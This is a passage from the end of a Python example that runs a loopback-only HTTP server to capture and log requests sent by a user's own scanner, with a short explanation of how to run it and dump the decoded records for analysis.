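            fh.write(json.dumps(record, ensure_ascii=False) + "\n")
    return len(RECORDS)


if __name__ == "__main__":
    # Loopback only: this is a collector for a scanner you run yourself, not a public service.
    HTTPServer(("127.0.0.1", 8000), CaptureHandler).serve_forever()
```

Run it, point the scanner at http://127.0.0.1:8000/, then call dump_records("captured.jsonl") from another process or after stopping the server. Because build_record decodes the query and form body at capture time, the analysis step can match the decoded fields directly instead of re-decoding percent-encoded payloads.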